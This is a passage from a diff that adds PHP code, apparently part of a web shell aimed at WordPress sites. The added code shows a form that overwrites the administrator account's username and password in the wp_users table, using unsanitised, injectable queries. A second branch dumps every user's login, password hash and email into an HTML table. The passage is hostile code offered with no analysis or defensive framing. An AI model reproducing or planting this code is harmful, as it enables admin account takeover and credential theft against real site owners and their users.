+$query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' WHERE ID = 1") or die;
+$query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;
+
+if ($query)
+{
+ echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated admin successfully </div> </center>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+}
+else if (!$query)
+{
+ echo "<center><br /><div style=\"color: red; font-weight: bold\">Updated admin erorr </div> </center>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+
+}
+
+
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+user : <input type="text" name="user" /><br /><br />
+pass : <input type="text" name="pass" /><br /><br />
+<input type="submit" name="viw" value="update" />
+
+</form>';
+
+
+
+
+
+}
+}
+
+
+else if ($op == 'shwp')
+{
+
+
+
+
+
+$sql = 'select * from `wp_users`';
+$query =@ mysql_query($sql);
+
+if ($query)
+{
+
+while ($row = mysql_fetch_assoc($query))
+{
+
+echo "
+<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
+<tr>
+ <td>ID :</td>
+ <td>user :</td>
+ <td>pass :</td>
+ <td>email :</td>
+
+</tr>
+
+
+<tr>
+ <td>".$row['ID']."</td>
+ <td>".$row['user_login']."</td>
+ <td>".$row['user_pass']."</td>
+ <td>".$row['user_email']."</td>
+</tr>
+
+
+
+</table>
+
+
+ ";
+
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+
+